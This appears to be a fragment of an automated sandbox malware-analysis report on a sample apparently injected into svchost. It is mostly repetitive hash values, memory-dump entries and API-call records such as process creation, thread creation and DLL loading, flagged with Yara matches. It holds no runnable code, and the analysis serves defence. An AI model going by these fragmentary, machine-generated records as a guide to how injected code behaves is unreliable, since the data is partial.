                                                                            • Opcode Fuzzy Hash: 6d8dd45ff88646e9a641d5ed6b3a0c2dd00693d73719af8e355cd5c009434f0b
                                                                            • Instruction Fuzzy Hash: AC90026124180813E140B6584884647000687D0312F95C021A2064569E8B298D516137
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 560cbb35381cef340470360ff8cb9e54405a752404925cb9c1a3536010b64604
                                                                            • Instruction ID: 3c6e6328f2957b0a7cdec0eb772fca3e1f6f158415ad49fce917347abdfdb011
                                                                            • Opcode Fuzzy Hash: 560cbb35381cef340470360ff8cb9e54405a752404925cb9c1a3536010b64604
                                                                            • Instruction Fuzzy Hash: 1090022164140912E101B2584484656000B87D0351FD5C032A1024569ECB258A92A133
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: dba549bc378ecfcdff6a7bf8adccafce8314b5bbdf759652b5746fd6d630c293
                                                                            • Instruction ID: 9f8c10ad5de56274b347a8719ca2b4e432e14d5a73d59f13b9667694d895d047
                                                                            • Opcode Fuzzy Hash: dba549bc378ecfcdff6a7bf8adccafce8314b5bbdf759652b5746fd6d630c293
                                                                            • Instruction Fuzzy Hash: AE90022134140413E140B25854986464006D7E1311F95D021E0414568CDA1589565223
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c8428890eae5bbf2c19a0e7bbbb6f9e9052f11ecccd2b88ad67b16f739c021d4
                                                                            • Instruction ID: 6aeb88f296ac03c9e7b94fbef8dab53ede78960a62f6895e4c34ed7e54c42e62
                                                                            • Opcode Fuzzy Hash: c8428890eae5bbf2c19a0e7bbbb6f9e9052f11ecccd2b88ad67b16f739c021d4
                                                                            • Instruction Fuzzy Hash: F390022925340412E180B258548864A000687D1312FD5D425A001556CCCA1589695323
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                            • Instruction ID: 9f6034c568eabfdaf0c2e47c60c6f708f4538fce838069e431de605fe0a14a09
                                                                            • Opcode Fuzzy Hash: bbbd67f89ce2659a449c11abc161b016d33dedd8bb7844066d55f1a0efb820c2
                                                                            • Instruction Fuzzy Hash: C890023124140823E111B2584584747000A87D0351FD5C422A042456CD97568A52A123
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                            • Instruction ID: de90223db0a197316014b1d3d92a172e49ee224e11891a55dbb6319160ee72dd
                                                                            • Opcode Fuzzy Hash: 81f49b60628e2ef02c38a6a068a103ba99931713ec1b48b137d785e31814d7a6
                                                                            • Instruction Fuzzy Hash: 28900221282445626545F2584484547400797E03517D5C022A1414964C86269956D623
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                            • Instruction ID: c179e1ba678b5ba94903426f59eb340adae52e224be21bedaaf7553577f7d5f1
                                                                            • Opcode Fuzzy Hash: 3eb7011927cb01bf7b45870d7c7ecd4519663ffca0d6ebbdadd6aeaac32ceacd
                                                                            • Instruction Fuzzy Hash: 6A90023124148C12E110B258848478A000687D0311F99C421A442466CD879589917123
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
                                                                            • Instruction ID: 81f0fea1dab6c1d052ee77b177fc65b5619418195afab6440ba213b2afe9f8a3
                                                                            • Opcode Fuzzy Hash: 46bc739af967718442d05418bde317b80dc344cb68a8e2ce7591e3e738844c7e
                                                                            • Instruction Fuzzy Hash: A490023124140C52E100B2584484B86000687E0311F95C026A0124668D8715C9517523
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                            • Instruction ID: 5978dac7a7856e3ccb7f673c0fe2cecd6f7a663fc39f32d5ca1ecfae037b3200
                                                                            • Opcode Fuzzy Hash: 23580bbe5d57265c6838eb815d41f2fceeaeb42744cf0e06d3aced7cc57ae01b
                                                                            • Instruction Fuzzy Hash: 7F90023124140812E100B6985488686000687E0311F95D021A5024569EC76589916133
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                            • Instruction ID: 598a9f711bbc988c4d73ab27d2a4cfc57ad91d81525b01bafd9b60d0d55cf482
                                                                            • Opcode Fuzzy Hash: 5d21c36e49239bd44e651e81a9e9b4873c14389e9fd38e8f46c6cc392d0ae26d
                                                                            • Instruction Fuzzy Hash: 3490023164550812E100B2584594746100687D0311FA5C421A042457CD87958A5165A3
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                            • Instruction ID: ddde1d1d811e797d6f2b2adc35cbecdd6d4019858da708dd10ce2287fdfcfc37
                                                                            • Opcode Fuzzy Hash: 3325fa8378bdc598e4097615e6d3fe4f9088084718b92c9206a22ec662a298d2
                                                                            • Instruction Fuzzy Hash: 5690022128545512E150B25C44846564006A7E0311F95C031A08145A8D865589556223

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 479 29c0df5-29c0e12 481 29c0e1a-29c0e6a call 29dc070 call 29c45c0 call 29b1470 call 29d1d10 479->481 482 29c0e15 call 29db660 479->482 491 29c0e6c-29c0e7b PostThreadMessageW 481->491 492 29c0e8a-29c0e90 481->492 482->481 491->492 493 29c0e7d-29c0e87 491->493 493->492
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 029C0E77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 72945936$72945936
                                                                            • API String ID: 1836367815-646505885
                                                                            • Opcode ID: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                            • Instruction ID: 1064ec88f4b2768a9c5da380c0a7f37d690b1a0455e03616058359abc5ccd5e9
                                                                            • Opcode Fuzzy Hash: b7b66841ccd1dcc359b4dde223a7a3e365c346da850d1c2025f1f3d85d26986e
                                                                            • Instruction Fuzzy Hash: 41115BB2C4114CBAEB01ABA48C81EEF7BBCEF45798F44C168F604A3140E5355D028FA2

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(72945936,00000111,00000000,00000000), ref: 029C0E77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 72945936$72945936
                                                                            • API String ID: 1836367815-646505885
                                                                            • Opcode ID: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                            • Instruction ID: 5d563708ce2680777985a6cd7cb1827c802878684e9e7f6651b75b4aa3579ecf
                                                                            • Opcode Fuzzy Hash: dbe5725f5941867727f6a4ce5034651299952f64859f0e0394aac61bf8557a0f
                                                                            • Instruction Fuzzy Hash: F401C4B2D4125CBAEB11AAE48C81EEF7B7CDF41694F05C168FA0467140E6645E068BB2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeUninitialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 3442037557-2016760708
                                                                            • Opcode ID: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                            • Instruction ID: af114b17258f386b6888c9cc9c693e7e17e533278a2a58fcf2488fa8974e8e23
                                                                            • Opcode Fuzzy Hash: 6a2f5b9287dcb325afedf9cc9deb538138e8142e927f8e99eae6b10b421225ec
                                                                            • Instruction Fuzzy Hash: BB314FB5A0060EAFCB00DFD8D9809EEB7BAFF88304B108559E505AB214D771AE05CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeUninitialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 3442037557-2016760708
                                                                            • Opcode ID: b5b5d24e6b64f91af77f115aa64ee472c6cd5b18dcfe081474d73374db37efb5
                                                                            • Instruction ID: 9472424eafc5635fdf735a4d65c599633eaba7fd411dc28b6b09bcff04cbc452
                                                                            • Opcode Fuzzy Hash: b5b5d24e6b64f91af77f115aa64ee472c6cd5b18dcfe081474d73374db37efb5
                                                                            • Instruction Fuzzy Hash: 63313EB5A0060EAFDB00DFD8C8809EFB7BAFF88304B108559E505EB214D775EE058BA1
                                                                            APIs
                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 029D850D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$NameName_
                                                                            • String ID: 8"
                                                                            • API String ID: 3514427675-651061635
                                                                            • Opcode ID: e34674aff2d4f6be4d6cba9acc2272cc134248dcf68679b792830d7deddea0aa
                                                                            • Instruction ID: 954fe02b5907d5a8dc6d483c5002b57a2dba0dbed47265b595edbdd061a5f2d5
                                                                            • Opcode Fuzzy Hash: e34674aff2d4f6be4d6cba9acc2272cc134248dcf68679b792830d7deddea0aa
                                                                            • Instruction Fuzzy Hash: 5AF039B92002047BD610EE59DC40EAB77AEEFC9750F008409FA08A7240C670B9128BB4
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 029D3C2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: wininet.dll
                                                                            • API String ID: 3472027048-3354682871
                                                                            • Opcode ID: 5bf6a71b8d9befcb1f546c76200517df179f4223fe190e1ff9edc745545f0eff
                                                                            • Instruction ID: 1ce14127bd596d8fc04d1810be4db4c4342a898987e35fe3169ee92da6584768
                                                                            • Opcode Fuzzy Hash: 5bf6a71b8d9befcb1f546c76200517df179f4223fe190e1ff9edc745545f0eff
                                                                            • Instruction Fuzzy Hash: FD3182B1600605BBD714DFA4C884FEBB7BDEB88715F00891CEA196B280D77466408FA5
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 029C4632
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                            • Instruction ID: da3a7b1f1f31506d6a7fe403f4c7316277c27cdda04d45580467f6c80d3fbc81
                                                                            • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                            • Instruction Fuzzy Hash: 6F0121B5E4020DBBDF10EBE4DD41F9DB3799B54308F1081A5E909A7240F671E714DB92
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,029C83AE,00000010,00000000,?,?,00000044,00000000,00000010,029C83AE,?,?,00000000), ref: 029D9960
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                            • Instruction ID: 1b4505938dfbd099d47ef53ef9810ee2fecea22728918a9dc7f40af474282cb3
                                                                            • Opcode Fuzzy Hash: 16882bb59a27b91d610d4615df323210088e01048f4a6282e7d400d52420b59d
                                                                            • Instruction Fuzzy Hash: CD01DDB2205108BBCB44DF99DC90EEB77AEAF8C714F408208BA1DE3240D630F8518BA4
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029B9E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: ff57c9e718e5094546e8ca57f8baed57ff3df2d6420d1bf538e82e9d3bbfccb2
                                                                            • Instruction ID: ffd51755c3490986034b71c5e5cd4120275abcaaaafa3ddddde4ce77cd490581
                                                                            • Opcode Fuzzy Hash: ff57c9e718e5094546e8ca57f8baed57ff3df2d6420d1bf538e82e9d3bbfccb2
                                                                            • Instruction Fuzzy Hash: 2AF0657334020436E32165E99C02FD7738DDFC5B65F14001AF70CEB1C0D595B44156A5
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029B9E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: a52c162f34ba95473b139bb407793ecac47cd5daeb32478411856721fe926246
                                                                            • Instruction ID: 29543cfdcc92b8a6c2102495d668c5adf9f0fe09bca145ae36adb98ee479628a
                                                                            • Opcode Fuzzy Hash: a52c162f34ba95473b139bb407793ecac47cd5daeb32478411856721fe926246
                                                                            • Instruction Fuzzy Hash: 83F0927328060437E33166E58C03FD7668ECFD6BA1F244019FB1CFB1C0D9A6B9418AA5
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(029C1A89,?,029D598B,029C1A89,029D573F,029D598B,?,029C1A89,029D573F,00001000,?,?,00000000), ref: 029D985C
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                            • Instruction ID: 48a2eec01a8a62ef3b8c550ab9279205c6c21c9bfcb0bf29c991d948a56cbd0f
                                                                            • Opcode Fuzzy Hash: cbed1c5dadce8dee4f5864739191d440a36e63c66ed89e5065b9b69a9647fa94
                                                                            • Instruction Fuzzy Hash: BEE092752042047BC710EE98DC40FEB37EEEFC5710F004419F918A7241C630B9118BB4
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C1F85D8B,00000007,00000000,00000004,00000000,029C3E3D,000000F4), ref: 029D98AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 632fd65b2b51fd1a652c04687d9fb30c2d13ce3d8a1435a1acbd1798a4f6cfb8
                                                                            • Instruction ID: ef644e795f2acd3d124e751a7187c22bcfce2d5061d67d8cd48f370c8c517b91
                                                                            • Opcode Fuzzy Hash: 632fd65b2b51fd1a652c04687d9fb30c2d13ce3d8a1435a1acbd1798a4f6cfb8
                                                                            • Instruction Fuzzy Hash: A2E09AB62002087FD614EF98DC41FAB73AEEFC9710F008408FA08A7240C630B9118BB5
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 029C841C
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fe3a8205f548bab260e7cd46b00ced602cec4903c88813c3e21c41070a38aa0b
                                                                            • Instruction ID: 3bf951fa5620a6ca6eb03cfda68f00f63acaa1a7554152ffa62382d88466e227
                                                                            • Opcode Fuzzy Hash: fe3a8205f548bab260e7cd46b00ced602cec4903c88813c3e21c41070a38aa0b
                                                                            • Instruction Fuzzy Hash: BBE0867624420427FB256AA8EC45F66335CAB48728F284664B91CDB6C3E678F5418151
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 029C841C
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: eac3ba67f7b3937cfecc90cd7ae0d4243b74fb05bdcf39fa88f826da1d5ecb3a
                                                                            • Instruction ID: aade27ea6605c9de68ce2ed210fed3dbbff22752cc0ad3b3c54ec1760c39c211
                                                                            • Opcode Fuzzy Hash: eac3ba67f7b3937cfecc90cd7ae0d4243b74fb05bdcf39fa88f826da1d5ecb3a
                                                                            • Instruction Fuzzy Hash: 4FE026FA50820426E72231B86E46B3A3218BB44714F3C4B48FA2C8A1C3E238E0028652
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,029C1D90,029D807F,029D573F,029C1D56), ref: 029C8213
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 631cf9fcb14fbc0b6e67b98cd421a954d82a8f70c883a99ae798724acd3eb44d
                                                                            • Instruction ID: 7d7f110e3507587acc9eb4599cacac40e6c3f75d38d6798f133c58a163051291
                                                                            • Opcode Fuzzy Hash: 631cf9fcb14fbc0b6e67b98cd421a954d82a8f70c883a99ae798724acd3eb44d
                                                                            • Instruction Fuzzy Hash: DDE0C2726802002AFB46B6F08D4AFB5324A6F44394F1480A8BA0CDB5C2EA65F5408664
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,029C1D90,029D807F,029D573F,029C1D56), ref: 029C8213
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_29b0000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: f88d1ffb89c2eb10aab9401e585b83d442ef001d3f6e9363ea0bf427aa6656de
                                                                            • Instruction ID: 7f3aaf7c3125459764fe8c2badd15413af9c845755246191aa8a3f52043dff47
                                                                            • Opcode Fuzzy Hash: f88d1ffb89c2eb10aab9401e585b83d442ef001d3f6e9363ea0bf427aa6656de
                                                                            • Instruction Fuzzy Hash: B9D05E722802043BFA41A6F59C06F66328E5B447A4F148068BE0CE72C1E965F8408565
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
